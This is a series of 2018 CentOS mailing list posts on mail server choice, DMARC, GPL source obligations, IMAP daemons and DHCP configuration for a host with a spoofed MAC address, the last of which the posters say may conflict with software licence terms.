On 07/18/18 12:24, Andrew Holway wrote: Still a lot better than trying to run your own hodge-podge of nightmares on Linux. Beg pardon? Did I make a mistake on the email address? I thought this went to the CentOS general discussion list. I specifically meant setting up and running email services on linux is not for the feint of heart and delivers little real value considering the plethora of free and commercial email services available. Andrew, you should understand that you are talking to experts in Linux here. And even I (and I'm not considering myself an expert in Linux) have no trouble to set up mail server on Linux (with all blows and whistles like spam/virus filtering, etc). So, Mark meant to say your posts are offensive to Experts on this list. Please, take a note of it. With respect, Valeri -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Which is better? Microsoft Exchange 2016 or Linux-based SMTP Servers?
On 07/18/18 11:59, mark wrote: Andrew Holway wrote: In addition, if you go to 365, you are NOT BUYING the software, you're renting the service. You will be paying every year, and a service contract will cost, and, presumably, cost more every year. Still a lot better than trying to run your own hodge-podge of nightmares on Linux. Beg pardon? Did I make a mistake on the email address? I thought this went to the CentOS general discussion list. Well, I believe, the long and very polite Johnny's post suggesting OP to buy MS service was fundamentally correct. If the person possesses no UNIX/Linux knowledge, and not willing dive into learning that, yet has great urge to have/run server... well, MS is probably the most right place to direct such person to. Whatever one is not willing to pay for by one's time and effort, one will pay with money. You and I consider this list as last resort when we get stuck with technical problem, but some people consider it a first stop. And right answers depend on who is asking general advise in which direction to go, so I would recommend to OP (but not to UNIX/Linux person...) the same what Johnny had recommended. And I am the same shocked as you are by someone saying about his Linux nightmares. When said on this list that is. Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Which is better? Microsoft Exchange 2016 or Linux-based SMTP Servers?
On 07/18/18 11:03, mark wrote: Turritopsis Dohrnii Teo En Ming wrote: I am torn between deploying Microsoft Exchange 2016 and Linux-based SMTP servers like sendmail, postfix, qmail and exim. Relative ease of installation and configuration is an important consideration factor. Microsoft Exchange 2016, Domain Controller, and Active Directory are relatively easy to install and configure. Linux-based SMTP servers are extremely difficult to install and configure and of course, extremely time-consuming. Based on experience at a number of jobs, Exchange may appear to be easy to configure, but as soon as you get past the utterly basic configuration, when management or other departments want more, it then becomes a major headache. I work for a US federal contractor these days, on site (civilian sector) and they just gave up, and moved to M$ cloud for it. And most people HATE IT. Searching, if you're not using Outlook, is either terrrible or nonexistant (they've started auto-archiving here, and I'm hearing there is no search). In addition, if you go to 365, you are NOT BUYING the software, you're renting the service. You will be paying every year, and a service contract will cost, and, presumably, cost more every year. Linux, once you get over the learning curve, is not that difficult to administer. and there's a lot of online help (just don't expect us to do your job for you, as a few folks who've posted here over the years seeem to expect). You can also get contract help. If that's important, you might consider upstream, who do provide paid support. And it will cost a lot less than M$. One of the features of Microsoft Exchange 2016 is that you can create additional folders on your Inbox in the server (server-side). Can Linux-based SMTP servers do that? I don't know of any mail system that you cannot do that in. Every one allows that. Besides the above considerations, how about security? Traditionally, Linux is far more secure than Windows. Yup. And fixes come a *LOT* faster, often in hours or days, as opposed to M$'s "there's no probem, it's your fault (insert one week to three months), ok, ok, we've got a fix Judging by security, Linux-based SMTP servers ought to have a higher percentage of the market share? Back in the last century, the old mainframe line was "nobody ever lost their job by recommending IBM"; since the nineties, it's been "recommending Windows", because that's all they know. We won't say how much M$ pays, both for advertising, FUD, and illegal under the table payments to manufacturers. In my observation it stems from the practices of hiring IT professionals. Department or company personnel manager who has no IT knowledge (and shouldn't!) has to hire IT manager. Here is where certifications came into play (and MS Certifications are plentiful around...), so the top guy in the IT position is most likely MS-trained guy. And that defines the field of knowledge of the whole IT team eventually. Incidentally, I contradicted myself above, did anybody notice? I told about IT manager "trained", and training is different from knowledge, simply speaking you just know which buttons to push. But between people who possess knowledge (therefore can look deeper even when following manual doesn't work) I know almost no one who has even single certificate... Valeri Finally, I can only use Windows Server 2016 Standard Evaluation Copy FREE for a period of 3 years MAXIMUM. But I can use Linux servers and Mail Transport Agents (MTA) FREE perpetually. Yup. mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Widevine plugin for CentOS 6?
On 07/13/18 08:34, Matthew Phelps wrote: On Fri, Jul 13, 2018 at 9:23 AM Johnny Hughes wrote: On 07/13/2018 08:17 AM, Johnny Hughes wrote: On 07/13/2018 07:42 AM, Matthew Phelps wrote: Does anyone know of a CentOS 6 compiled version of the widevine DRM plugin? With Firefox 60ESR, Netflix (e.g.) installs a version in your ~/.mozilla/firefox/(profile name)gmp-widevinecdm/ directory but it has the following library failures in 'ldd' output: ldd libwidevinecdm.so ./libwidevinecdm.so: /usr/lib64/libstdc++.so.6: version `CXXABI_1.3.5' not found (required by ./libwidevinecdm.so) ./libwidevinecdm.so: /usr/lib64/libstdc++.so.6: version `GLIBCXX_3.4.14' not found (required by ./libwidevinecdm.so) ./libwidevinecdm.so: /usr/lib64/libstdc++.so.6: version `GLIBCXX_3.4.15' not found (required by ./libwidevinecdm.so) I have not tried playing DRM things on the CentOS-6 browser .. but this looks like a place to start: https://support.mozilla.org/en-US/kb/enable-drm To be clear .. I don't know if the compiled version of firefox we shipped has a DRM widevine that will work with netflix .. the error you are getting seems to happen because of where: libwidevinecdm.so was compiled (against which glibc-devel). so .. maybe adding in the google widevine and somehow disabling the built in firefox one might work .. OR .. disabling the google version might work, etc. It appears firefox downloads the google library each time it is requested, and the one it downloads is compiled against the wrong libraries. I realize this is not a CentOS support issue per se, I was inquiring if anyone in the community, or upstream, had dealt with this before. I agree, we should apply directly to one of these three letter agencies to have their code straightened up ;-) I don't know which one though. Valeri I understand the CentOS 7 version works fine, however we are still running CentOS 6. -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Imap daemons for CentOS 6 (other then cyrus-imapd)
On 06/21/18 16:46, Marcelo Ricardo Leitner wrote: On Thu, Jun 21, 2018 at 05:23:31PM -0400, Robert Heller wrote: At Thu, 21 Jun 2018 20:42:50 +0200 CentOS mailing list wrote: On 21.06.2018 19:28, Robert Heller wrote: Are there any imap daemons (besides cyrus-imapd). cyrus-imapd is appearently not compatible with postfix + procmail. I need an imap daemon that will work with a postfix + procmail system. the problem seems to be procmail, I use postfix and cyrus-imapd with no problems; No actually the problem is cyrus-imapd: cyrus-imapd expects all users to use imap (or pop3) to access their E-Mail. It does not allow for other E-Mail methodologies, including using local UNIX utilies (eg mail or pine or mh or other tools like QWK). Just a bit of correction. Pine (which is so old, alpine replaced it) or alpine you can configure to talk through IMAP protocol, then it will not matter what sort of IMAP server do you have. Just minor correction. Valeri So it's not that postfix + procmail + cyrus doesn't work, but that you have a requirement that cyrus can't fulfill. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Imap daemons for CentOS 6 (other then cyrus-imapd)
On 06/21/18 16:23, Robert Heller wrote: At Thu, 21 Jun 2018 20:42:50 +0200 CentOS mailing list wrote: On 21.06.2018 19:28, Robert Heller wrote: Are there any imap daemons (besides cyrus-imapd). cyrus-imapd is appearently not compatible with postfix + procmail. I need an imap daemon that will work with a postfix + procmail system. the problem seems to be procmail, I use postfix and cyrus-imapd with no problems; No actually the problem is cyrus-imapd: cyrus-imapd expects all users to use imap (or pop3) to access their E-Mail. It does not allow for other E-Mail methodologies, including using local UNIX utilies (eg mail or pine or mh or other tools like QWK). I have uninstalled cyrus-imapd and installed dovecot instead. This actually works. dovecot is even happy to use a Let's Encrypt cert for SSL. I use postfix + dovecot since forever. I recently switched from amavisd-new to maia. It probably is same simple on Linux as it is on FreeBSD - I have servers under FreeBSD (or rather multiple jails on FreeBSD box). Good luck! Valeri ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Passwords in plain text
On Mon, June 18, 2018 7:10 am, Johnny Hughes wrote: > On 06/17/2018 11:13 AM, Alice Wonder via CentOS wrote: >> On 06/17/2018 09:11 AM, Alice Wonder via CentOS wrote: >>> On 06/17/2018 08:52 AM, Michael Hennebry via CentOS wrote: >>>> I'm petty sure I messed up attributions, so am deleting them. >>>> >>>>>> I believe this is a DMARC issue. Yahoo, among other places, has set >>>>>> their dmarc records to p=reject: >>>> >>>>>> So, if your mail hosting provider enforces dmarc,(gmail does) and >>>>>> you >>>>>> get mail from a list that doesn't rewrite the headers, and people >>>>>> from places like yahoo post to the list, you'll likely get some form >>>>>> of warning about being being kicked off the mailing list every now >>>>>> and then. The frequency depends on how often people from p=reject >>>>>> places post, and what the settings are for bounce handling of the >>>>>> mailing list in question. >>>> >>>>> This is indeed what happened. An email from yahoo.com.uk caused >>>>> gmail >>>>> to reject all the mails sent by that user because of the yahoo DMARC >>>>> settings. >>>> >>>> Say it isn't so: *An* e-mail, just *one* from yahoo.com.uk >>>> caused every gmail user to have his account disabled. >>>> >>>> I'd heard of the DMARC thing with mailing lists before, >>>> but had not known it enabled single e-mails of mass destruction. >>> >>> I run dmarc on my mail server but only in report mode, it doesn't >>> reject. >>> >>> I did it as a test (for years) and am fully convinced that dmarc is >>> worthless for real world protection. >>> >>> Numerous mail lists out there are configured in such a way that dmarc >>> gets triggered and that just isn't going to change. >>> >>> It's a neat idea but it's not backwards compatible with the way SMTP >>> already works. >>> >>> I can not recommend its use. I do recommend mail server software update >>> if possible to be compatible but I just can not recommend mail servers >>> enforce dmarc. >>> >>> DKIM is a good thing, but dmarc breaks things too badly. >>> >>> Even DKIM though is of limited usefulness - it seems the spammer >>> blacklists don't really care. Even with proper DKIM signature on a >>> domain with correct reverse DNS set up for years, they will still add >>> you to the spam blacklist if any other host on your subnet is >>> identified >>> as a spammer. >>> >>> So even the blacklists don't really utilize this anti-spam anti-spoof >>> technology, which makes it kind of worthless. >>> >>> Using DKIM as one of several factors in spamassassin though is possibly >>> helpful, though most spammers these days have a validating DKIM sig. >>> >>> ___ >> >> >> Let me put it this way - in the several years of running dmarc is report >> only mode, over 99% of reported violations are false positives from mail >> lists. >> >> That high of a false positive rate tells me it is broken technology. Fully agree. > > I agree with you .. unfortunately, gmail does not. They have enabled it > for gmail users .. so if someone from yahoo xends a mail from a yahoo > address, it gets rejected by gmail accounts. The list setting wrt dmarc > doesn't matter .. it is totally gmail enabling it. > > What our settings do is NOT send the From (as the original sender), if > the sender is on a domain where dmarc is enabled, so that gmail does not > reject it. > > If it is rejected by gmail .. it causes (eventually) .. not he sender's, > but the recipient's account on gmail to be disabled by the mailing list > as non-existent. I'm surprised no one arrived at conclusion: don't use gmail then. Valeri > > What the change that Brian and I tried to make, and Fabian finally fixed > :D (thanks Fabian), is to fix that only from doamins that enable dmarc > (ie, yahoo.* ) so that domains who turn on dmarc as enforcing (ie gmail) > do not cause rejects of those emails. > > > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] CentOS Kernel Support
On 06/14/18 11:23, Stephen John Smoogen wrote: On 14 June 2018 at 12:16, Peter Kjellström wrote: On Thu, 14 Jun 2018 10:12:30 -0500 Valeri Galtsev wrote: On 06/14/18 10:00, Peter Kjellström wrote: On Thu, 14 Jun 2018 16:26:27 +0200 Gianluca Cecchi wrote: ... The src.rpm for that kernel is probably available somewhere. I'm fairly certain you cannot download the SRPM for EUS kernels. You might if you're a Red Hat customer paying for that product (but don't take my word for it). ... I agree for the format of release (SRPM), but in any case Red Hat should provide the sources for the changes, as the kernel is GPL-2.0 Then one can manually try to merge them in a patched kernel in some way... Gianluca Redhat of course complies with the GPL and provide source to the customers that get access to the binary packages. They are not required to provide the sources to anyone else. GPL requires to provide source if everything derived from the original source to everybody, not only to customers. And RedHat was ever compliant with GPL. Kudos to RedHat! So, if there exist patched kernels of out of support life, they should be downloadable somewhere somehow. No you are minunderstanding the GPL. You are only required to provide source to those who got the binary artifact(s). They then have the full GPL rights to further modify etc. In many cases the binaries are distributed to everyone and then so is the source. In other cases (such as RHEL) only source is provided to everyone (but that is fine too). Consider a simpler case: I make a copy of a existing GPL pkg. I modify this and use it myself. I do not have to share my changes with anyone. My copy is still GPL though.. ..so if I give a copy of the source to a friend it no longer matters (to him/her) wether I made that source public before or not. They can modify or not and make available publicly or not. Had I sent my friend a binary copy he/she would have had the right to require me to also hand over the source. None of us would have any obligations to a 3rd party. To back up Peter on this, here are some relevant links from the FSF. https://www.gnu.org/licenses/gpl-faq.html#GPLRequireSourcePostedPublic Yep, found it myself. I stand corrected. Valeri The GPL does not require you to release your modified version, or any part of it. You are free to make modifications and use them privately, without ever releasing them. This applies to organizations (including companies), too; an organization can make a modified version and use it internally without ever releasing it outside the organization. But if you release the modified version to the public in some way, the GPL requires you to make the modified source code available to the program's users, under the GPL. Thus, the GPL gives permission to release the modified program in certain ways, and not in other ways; but the decision of whether to release it is up to you. https://www.gnu.org/licenses/gpl-faq.html#DevelopChangesUnderNDA Does the GPL allow me to develop a modified version under a nondisclosure agreement? (#DevelopChangesUnderNDA) Yes. For instance, you can accept a contract to develop changes and agree not to release your changes until the client says ok. This is permitted because in this case no GPL-covered code is being distributed under an NDA. You can also release your changes to the client under the GPL, but agree not to release them to anyone else unless the client says ok. In this case, too, no GPL-covered code is being distributed under an NDA, or under any additional restrictions. The GPL would give the client the right to redistribute your version. In this scenario, the client will probably choose not to exercise that right, but does have the right. There are other questions in the FAQ which also cover this. /Peter ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] CentOS Kernel Support
On 06/14/18 11:16, Peter Kjellström wrote: On Thu, 14 Jun 2018 10:12:30 -0500 Valeri Galtsev wrote: On 06/14/18 10:00, Peter Kjellström wrote: On Thu, 14 Jun 2018 16:26:27 +0200 Gianluca Cecchi wrote: ... The src.rpm for that kernel is probably available somewhere. I'm fairly certain you cannot download the SRPM for EUS kernels. You might if you're a Red Hat customer paying for that product (but don't take my word for it). ... I agree for the format of release (SRPM), but in any case Red Hat should provide the sources for the changes, as the kernel is GPL-2.0 Then one can manually try to merge them in a patched kernel in some way... Gianluca Redhat of course complies with the GPL and provide source to the customers that get access to the binary packages. They are not required to provide the sources to anyone else. GPL requires to provide source if everything derived from the original source to everybody, not only to customers. And RedHat was ever compliant with GPL. Kudos to RedHat! So, if there exist patched kernels of out of support life, they should be downloadable somewhere somehow. No you are minunderstanding the GPL. It turns out you are absolutely right. You only have provide modified source to users to whom you distribute derived work. Found it here: https://www.gnu.org/licenses/gpl-faq.en.html#GPLRequireSourcePostedPublic I stand corrected. Thanks! Valeri You are only required to provide source to those who got the binary artifact(s). They then have the full GPL rights to further modify etc. In many cases the binaries are distributed to everyone and then so is the source. In other cases (such as RHEL) only source is provided to everyone (but that is fine too). Consider a simpler case: I make a copy of a existing GPL pkg. I modify this and use it myself. I do not have to share my changes with anyone. My copy is still GPL though.. ..so if I give a copy of the source to a friend it no longer matters (to him/her) wether I made that source public before or not. They can modify or not and make available publicly or not. Had I sent my friend a binary copy he/she would have had the right to require me to also hand over the source. None of us would have any obligations to a 3rd party. /Peter -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] CentOS Kernel Support
On 06/14/18 10:00, Peter Kjellström wrote: On Thu, 14 Jun 2018 16:26:27 +0200 Gianluca Cecchi wrote: ... The src.rpm for that kernel is probably available somewhere. I'm fairly certain you cannot download the SRPM for EUS kernels. You might if you're a Red Hat customer paying for that product (but don't take my word for it). ... I agree for the format of release (SRPM), but in any case Red Hat should provide the sources for the changes, as the kernel is GPL-2.0 Then one can manually try to merge them in a patched kernel in some way... Gianluca Redhat of course complies with the GPL and provide source to the customers that get access to the binary packages. They are not required to provide the sources to anyone else. GPL requires to provide source if everything derived from the original source to everybody, not only to customers. And RedHat was ever compliant with GPL. Kudos to RedHat! So, if there exist patched kernels of out of support life, they should be downloadable somewhere somehow. On the other hand, I will not raise any issue about source of these patched ancient kernels, as my sympathy as human is on RedHat's side: I know how much work that is, and programmers who do that have to feed their families. (This is why BSD style license which is different from GPL in this respect does make sense either). Valeri /Peter ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] squishy bell
On 06/11/18 00:11, Michael Hennebry wrote: Both Gnome and KDE give me a loud squishy bell at the thought of the drop of a hat. I did not get that in C6. I infer it is a C7-specific thing. Short of disabling my audio altogether, how do I make it go away? Mine is definitely not and answer to your question, nut you may also try Mate (which is fork of GNOME): I for one is happy with mate both on my Linux laptop and FreeBSD workstation. Valeri Not one of C7's better features. -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] C7, encryption, and clevis
On Sun, June 10, 2018 6:19 pm, Keith Keller wrote: > On 2018-06-08, Valeri Galtsev wrote: >> >> Frank, I 100% agree with you. The only case with spoofed MAC address and >> license that may have chance to stand in court will be if all below are >> true: >> >> 1. the company issued perpetual license. >> 2. the company does not exist > > Based on what's written below, it seems like the company does in fact > still exist, and that therefore the organization trying to spoof MACs > may be violating their license. I hope the company which sells the > program doesn't read this mailing list. Keith, you as well as Frank originally and following Frank I all agree that the case described in this thread may constitute violation of license agreement. So, for the OP it may be advantageous think everything over... That is why I tried to draw hypothetical set of conditions I under which if all if all are met, it may not fall under violation. To show how narrow could be the case in which it may, just may not be a violation. You trimmed away several other conditions that are necessary as well. Anyway, as we all agree, we should comply license agreement, or not use software at all if we can not comply for one reason or another. Valeri > >>> It's apparently a very good molecular modeling program, and to be real, >>> my >>> users tell me that the company that bought the original company wants, >>> and >>> I'm not making this up, $15k US to generate a license for a new >>> workstation. And there's two? three? workstations that run it. >>> >>> And this is a US gov't agency (civilian secrot). Budget? We don' need >>> no >>> steenkeen budgets, the Magic Hand of the Market will produce all the >>> results we need. > > --keith > > -- > kkel...@wombat.san-francisco.ca.us > > > _______ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] C7, encryption, and clevis
On 06/08/18 15:45, m.r...@5-cent.us wrote: Valeri Galtsev wrote: On 06/08/18 15:26, m.r...@5-cent.us wrote: On a similar note: one of the companies whose software scientists here were using a lot (IDL is a product) changed hand several times, and last owner changed licensing terms and stopped signing perpetual licenses. With perpetual license you were able to keep upgrading software during support period, usually 1 year, and keep using last version later forever only you are locked to that older version. They stopped signing perpetual licenses, and made it "software for rent" with 1 year rent term. When that happened I recommended all our people to avoid using IDL in new projects (python was my recommendation as fair replacement - just what I know, not that I consider it better than other alternatives). As a programmer (former I should say, as I don't put my dirty hands into code lately, almost not) I wouldn't invest my time into mastering something that I not necessarily will have access to at some point in a future... Yeah. We have a number of folks here using R, and fewer still using Matlab. Sounds like your former matlab users are happy with R (bad name, BTW, try to search...). Thanks, I will know now what to mention as alternative if it will be about matlab! And it has heavy hooks for python. And it's open source. Matlab may have more sophisticated tools, but I know about R, I set it up for those who asks, have it on main number crunchers here. I just never played with it myself, and didn't have any idea that matlab users may be happy about it. But now I know, thanks again! Valeri mark "now, there is the guy who runs R jobs on a server with a ton of memory *and* to Tesla cards that run for, literally, 2-3 *weeks*. Lotta data" ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] C7, encryption, and clevis
On 06/08/18 15:26, m.r...@5-cent.us wrote: Valeri Galtsev wrote: On 06/08/18 13:48, m.r...@5-cent.us wrote: Frank Cox wrote: so if it would work, replace shortname with short and short1? With all of this hokey-pokey surrounding licensing and mac addresses, I wonder if this outfit is actually still in compliance with the terms of their license for this software, whatever it may be? If the software licensed to run only on Machine X and Machine X has now been junked and replace by Machine Y, then isn't the solution to obtain a license for the software for Machine Y or be out-of compliance regardless of the technical ability to spoof whatever it's looking for? Frank, I 100% agree with you. The only case with spoofed MAC address and license that may have chance to stand in court will be if all below are true: 1. the company issued perpetual license. 2. the company does not exist 3. the original hardware died (be it motherboard whose embedded NIC license was locked to or network card) 4. single replacement machine (meeting requirements of license; sometimes it is number of CPUs/cores, memory, etc) is used to replace it [imminently needing to spoof MAC address] 5. fair effort was made to find and notify about the above whoever inherited rights of dissolved company But I bet the lawyer can find flaws in what I tried to say. Both users' old workstations were at least 6 years old, maybe more. They got surplused (I'm the one who did that). So it's only on the two machines that the licenses were for. But I assume it was very expensive when they bought it. On a similar note: one of the companies whose software scientists here were using a lot (IDL is a product) changed hand several times, and last owner changed licensing terms and stopped signing perpetual licenses. With perpetual license you were able to keep upgrading software during support period, usually 1 year, and keep using last version later forever only you are locked to that older version. They stopped signing perpetual licenses, and made it "software for rent" with 1 year rent term. When that happened I recommended all our people to avoid using IDL in new projects (python was my recommendation as fair replacement - just what I know, not that I consider it better than other alternatives). As a programmer (former I should say, as I don't put my dirty hands into code lately, almost not) I wouldn't invest my time into mastering something that I not necessarily will have access to at some point in a future... Yeah. We have a number of folks here using R, and fewer still using Matlab. Sounds like your former matlab users are happy with R (bad name, BTW, try to search...). Thanks, I will know now what to mention as alternative if it will be about matlab! Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] C7, encryption, and clevis
On 06/08/18 13:48, m.r...@5-cent.us wrote: Frank Cox wrote: so if it would work, replace shortname with short and short1? With all of this hokey-pokey surrounding licensing and mac addresses, I wonder if this outfit is actually still in compliance with the terms of their license for this software, whatever it may be? If the software licensed to run only on Machine X and Machine X has now been junked and replace by Machine Y, then isn't the solution to obtain a license for the software for Machine Y or be out-of compliance regardless of the technical ability to spoof whatever it's looking for? Frank, I 100% agree with you. The only case with spoofed MAC address and license that may have chance to stand in court will be if all below are true: 1. the company issued perpetual license. 2. the company does not exist 3. the original hardware died (be it motherboard whose embedded NIC license was locked to or network card) 4. single replacement machine (meeting requirements of license; sometimes it is number of CPUs/cores, memory, etc) is used to replace it [imminently needing to spoof MAC address] 5. fair effort was made to find and notify about the above whoever inherited rights of dissolved company But I bet the lawyer can find flaws in what I tried to say. On a similar note: one of the companies whose software scientists here were using a lot (IDL is a product) changed hand several times, and last owner changed licensing terms and stopped signing perpetual licenses. With perpetual license you were able to keep upgrading software during support period, usually 1 year, and keep using last version later forever only you are locked to that older version. They stopped signing perpetual licenses, and made it "software for rent" with 1 year rent term. When that happened I recommended all our people to avoid using IDL in new projects (python was my recommendation as fair replacement - just what I know, not that I consider it better than other alternatives). As a programmer (former I should say, as I don't put my dirty hands into code lately, almost not) I wouldn't invest my time into mastering something that I not necessarily will have access to at some point in a future... Valeri It's apparently a very good molecular modeling program, and to be real, my users tell me that the company that bought the original company wants, and I'm not making this up, $15k US to generate a license for a new workstation. And there's two? three? workstations that run it. And this is a US gov't agency (civilian secrot). Budget? We don' need no steenkeen budgets, the Magic Hand of the Market will produce all the results we need. mark "not including building maintenance budgets" ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] C7, encryption, and clevis
On 06/08/18 12:01, m.r...@5-cent.us wrote: Valeri Galtsev wrote: On 06/08/18 10:27, m.r...@5-cent.us wrote: John Hodrien wrote: On Fri, 8 Jun 2018, m.r...@5-cent.us wrote: We've been required to encrypt h/ds, and so have been rolling that out over the last year or so. Thing is, you need to put in a password, of course, to boot the system. My manager found a way to allow us to reboot without being at the system's keyboard, a package called clevis. Works fine... except in a couple of very special cases. Those systems, the problem is that, due to older software, and *very* expensive licenses that are tied to a MAC address, I have to spoof the MAC address since my users got new(er) machines. Clevis is trying to contact its password server, using the *real* MAC address, but our DHCP has to serve the *spoofed* MAC address. I know, from trying, that I can't have two entries for the same system. Can anyone suggest a solution? Nothing wrong with having two MAC addresses listed for one IP. With ISC DHCP the label for a host has to be unique, but the hostname doesn't. The IP's not the problem, it's dhcpd gagging on two entries, two MAC addresses, for the same server name - think dhcpd.conf.local When I have a machine that can comes with different MAC addresses, and I have to give it the same IP, here is what I have in DHCP server configuration (Mac addresses and IP address are obfuscated below): # tricky machine host tricky { hardware ethernet xx:xx:xx:xx:xx:xx; fixed-address A.B.C.D; } # tricky machine again host tricky1 { hardware ethernet yy:yy:yy:yy:yy:yy; fixed-address A.B.C.D; } Hmmm... wonder if it will gag - we don't put the IP in that, that comes from DNS. The format we use is host P hardware ethernet ; fixed-address ;} It will not care if you put hostname (FGDN) instead of IP address - either is acceptable in config file. FQDN just makes your DHCP server go for every request it receives where FQDN is involved to DNS server, whereas if you have static IPs (not rotating all the time Windows gang like to probably to make compromised machines change their IP all the time), then you will save unnecessary DNS requests and associated delays by using IPs. so if it would work, replace shortname with short and short1? Yes, that was exactly John's point, I just put my example to make it more transparent: we all are quicker comprehending actual config files, than the documentations they were created according to. Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] C7, encryption, and clevis
On 06/08/18 10:27, m.r...@5-cent.us wrote: John Hodrien wrote: On Fri, 8 Jun 2018, m.r...@5-cent.us wrote: We've been required to encrypt h/ds, and so have been rolling that out over the last year or so. Thing is, you need to put in a password, of course, to boot the system. My manager found a way to allow us to reboot without being at the system's keyboard, a package called clevis. Works fine... except in a couple of very special cases. Those systems, the problem is that, due to older software, and *very* expensive licenses that are tied to a MAC address, I have to spoof the MAC address since my users got new(er) machines. Clevis is trying to contact its password server, using the *real* MAC address, but our DHCP has to serve the *spoofed* MAC address. I know, from trying, that I can't have two entries for the same system. Can anyone suggest a solution? Nothing wrong with having two MAC addresses listed for one IP. With ISC DHCP the label for a host has to be unique, but the hostname doesn't. The IP's not the problem, it's dhcpd gagging on two entries, two MAC addresses, for the same server name - think dhcpd.conf.local When I have a machine that can comes with different MAC addresses, and I have to give it the same IP, here is what I have in DHCP server configuration (Mac addresses and IP address are obfuscated below): # tricky machine host tricky { hardware ethernet xx:xx:xx:xx:xx:xx; fixed-address A.B.C.D; } # tricky machine again host tricky1 { hardware ethernet yy:yy:yy:yy:yy:yy; fixed-address A.B.C.D; } # and a bunch of other configs for the same machine The only trouble here will be if both MAC addresses request IP and and are both present, in that case DHCP server will offer that same static IP to the second request from different MAC address as well, but DHCP client (if smart) will check the presence of the IP address on the network already, and will not use that IP if it is already used and will send new request, and this will go on till first hardware stops using that IP address. Those are "tricky", "tricky1", ... labels that John mentioned should be unique, and they are only known to DHCP server. There are a bunch of Out Of Band management creeps that sit on the first network interface and come up when AC is connected no matter whether the system is up or not. And they come with different MAC address. And these are the ones that you can not assign the same IP as that the machine itself is supposed to have. Sorry about little rant, these creepy things are sysadmin's disaster, - UNIX sysadmin's disaster I meant. Or Windows sysadmin's best friend, I figure. Like in the phrase I'm stealing from one Windows sysadmin whom I respect a lot: "Did you try to power cycle the machine and see if it solves that?" I hope, this helps. Valeri mark ___ CentOS mailing list CentOS@centos.org 